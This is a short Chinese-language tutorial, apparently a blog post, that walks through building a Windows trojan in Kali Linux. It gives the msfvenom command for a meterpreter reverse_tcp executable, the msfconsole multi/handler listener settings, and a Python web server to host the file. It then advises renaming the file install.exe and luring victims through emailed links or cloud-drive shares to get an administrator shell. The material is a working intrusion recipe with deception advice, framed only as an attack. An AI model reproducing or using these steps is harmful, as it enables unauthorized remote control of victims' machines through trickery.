使用kali生成木马文件,创建一个简易的web服务器,将木马文件伪装成install.exe类型的安装文件,诱使被攻击者点击木马文件,从而getshell。
准备环境
攻击机(kali):192.168.29.130
被攻击机(window server 2008 SP2):192.168.29.135
1、攻击机(kali)使用msfvenom 生成 payload
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.29.130 LPORT=4444 -f exe > /xx.exe
2.kali攻击机打开msfconsole
use exploit/multi/handler //使用攻击模块
set payload windows/meterpreter/reverse_tcp //设置攻击载荷,建立反弹连接
set LHOST 192.168.29.130 //设置源IP(攻击机IP)
set LPORT 4444 //设置源端口(攻击机未被占用端口)
show options //查看配置选项(选填,可查看未配置选项)
3.实施攻击操作
4.kali攻击机将木马文件拷贝到指定目录
5.在该目录下面搭建一个简易的web服务器。命令:python -m SimpleHTTPServer 80
6.查看被攻击者的IP地址详情
7.被攻击者访问链接http://192.168.29.130/如下图,访问http://192.168.29.130/xx.exe即可直接下载木马文件(可以将URL放在邮件中发送给攻击者,或者放在网盘中添加指定内容诱使被攻击者点击,并且将exe文件名称修改为install.exe等类似安装文件进行伪装)
8.被攻击者将木马文件下载到本地
9.被攻击者双击木马文件后,攻击机kali得到一个会话,并且是最高administrator权限